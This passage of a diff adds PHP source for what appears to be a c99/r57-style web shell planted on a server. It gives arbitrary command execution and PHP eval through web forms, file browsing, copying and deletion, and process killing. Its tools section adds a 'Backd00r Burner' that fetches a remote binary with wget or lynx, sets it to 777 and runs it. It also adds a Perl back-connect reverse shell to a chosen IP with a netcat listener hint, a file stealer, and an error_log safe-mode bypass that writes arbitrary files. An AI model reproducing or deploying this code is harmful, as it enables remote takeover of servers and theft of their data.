+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} 
+   if (is_dir($v)) 
+   { 
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} 
+    $v .= "*"; 
+   } 
+   $cmdline .= " ".$v; 
+  } 
+  $tmp = realpath("."); 
+  chdir($d); 
+  $ret = myshellexec($cmdline); 
+  chdir($tmp); 
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} 
+  $ret = str_replace("\r\n","\n",$ret); 
+  $ret = explode("\n",$ret); 
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   if (in_array($v,$ret)) {fs_rmobj($v);} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} 
+  $act = "ls"; 
+ } 
+ elseif ($actpastebuff) 
+ { 
+  $psterr = ""; 
+  foreach($sess_data["copy"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} 
+   if ($copy_unset) {unset($sess_data["copy"][$k]);} 
+  } 
+  foreach($sess_data["cut"] as $k=>$v) 
+  { 
+   $to = $d.basename($v); 
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} 
+   unset($sess_data["cut"][$k]); 
+  } 
+  c99_sess_put($sess_data); 
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} 
+  $act = "ls"; 
+ } 
+} 
+if ($act == "cmd") 
+{ 
+if (trim($cmd) == "ps -aux") {$act = "processes";} 
+elseif (trim($cmd) == "tasklist") {$act = "processes";} 
+else 
+{ 
+ @chdir($chdir); 
+ if (!empty($submit)) 
+ { 
+  echo "<b>Result of execution this command</b>:<br>"; 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  $ret = myshellexec($cmd); 
+  $ret = convert_cyr_string($ret,"d","w"); 
+  if ($cmd_txt) 
+  { 
+   $rows = count(explode("\r\n",$ret))+1; 
+   if ($rows < 10) {$rows = 10;} 
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+  } 
+  else {echo $ret."<br>";} 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; 
+} 
+} 
+if ($act == "ls") 
+{ 
+ if (count($ls_arr) > 0) {$list = $ls_arr;} 
+ else 
+ { 
+  $list = array(); 
+  if ($h = @opendir($d)) 
+  { 
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} 
+   closedir($h); 
+  } 
+  else {} 
+ } 
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} 
+ else 
+ { 
+  //Building array 
+  $objects = array(); 
+  $vd = "f"; //Viewing mode 
+  if ($vd == "f") 
+  { 
+   $objects["head"] = array(); 
+   $objects["folders"] = array(); 
+   $objects["links"] = array(); 
+   $objects["files"] = array(); 
+   foreach ($list as $v) 
+   { 
+    $o = basename($v); 
+    $row = array(); 
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) {$type = "LINK";} 
+     else {$type = "DIR";} 
+     $row[] = $v; 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} 
+    $row[] = filemtime($v); 
+    if (!$win) 
+    { 
+     $ow = posix_getpwuid(fileowner($v)); 
+     $gr = posix_getgrgid(filegroup($v)); 
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); 
+    } 
+    $row[] = fileperms($v); 
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} 
+    elseif (is_link($v)) {$objects["links"][] = $row;} 
+    elseif (is_dir($v)) {$objects["folders"][] = $row;} 
+    elseif (is_file($v)) {$objects["files"][] = $row;} 
+    $i++; 
+   } 
+   $row = array(); 
+   $row[] = "<b>Name</b>"; 
+   $row[] = "<b>Size</b>"; 
+   $row[] = "<b>Modify</b>"; 
+   if (!$win) 
+  {$row[] = "<b>Owner/Group</b>";} 
+   $row[] = "<b>Perms</b>"; 
+   $row[] = "<b>Action</b>"; 
+   $parsesort = parsesort($sort); 
+   $sort = $parsesort[0].$parsesort[1]; 
+   $k = $parsesort[0]; 
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";} 
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; 
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; 
+   $row[$k] .= $y; 
+   for($i=0;$i<count($row)-1;$i++) 
+   { 
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} 
+   } 
+   $v = $parsesort[0]; 
+   usort($objects["folders"], "tabsort"); 
+   usort($objects["links"], "tabsort"); 
+   usort($objects["files"], "tabsort"); 
+   if ($parsesort[1] == "d") 
+   { 
+    $objects["folders"] = array_reverse($objects["folders"]); 
+    $objects["files"] = array_reverse($objects["files"]); 
+   } 
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); 
+   $tab = array(); 
+   $tab["cols"] = array($row); 
+   $tab["head"] = array(); 
+   $tab["folders"] = array(); 
+   $tab["links"] = array(); 
+   $tab["files"] = array(); 
+   $i = 0; 
+   foreach ($objects as $a) 
+   { 
+    $v = $a[0]; 
+    $o = basename($v); 
+    $dir = dirname($v); 
+    if ($disp_fullpath) {$disppath = $v;} 
+    else {$disppath = $o;} 
+    $disppath = str2mini($disppath,60); 
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} 
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} 
+    foreach ($regxp_highlight as $r) 
+    { 
+     if (ereg($r[0],$o)) 
+     { 
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} 
+      else 
+      { 
+       $r[1] = round($r[1]); 
+       $isdir = is_dir($v); 
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) 
+       { 
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} 
+        $disppath = $r[2].$disppath.$r[3]; 
+        if ($r[4]) {break;} 
+       } 
+      } 
+     } 
+    } 
+    $uo = urlencode($o); 
+    $ud = urlencode($dir); 
+    $uv = urlencode($v); 
+    $row = array(); 
+    if ($o == ".") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif ($o == "..") 
+    { 
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; 
+     $row[] = "LINK"; 
+    } 
+    elseif (is_dir($v)) 
+    { 
+     if (is_link($v)) 
+     { 
+      $disppath .= " => ".readlink($v); 
+      $type = "LINK"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+     } 
+     else 
+     { 
+      $type = "DIR"; 
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; 
+      } 
+     $row[] = $type; 
+    } 
+    elseif(is_file($v)) 
+    { 
+     $ext = explode(".",$o); 
+     $c = count($ext)-1; 
+     $ext = $ext[$c]; 
+     $ext = strtolower($ext); 
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; 
+     $row[] = view_size($a[1]); 
+    } 
+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Error_Log SAfe Mode Bypass By Adora </b>
+      <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
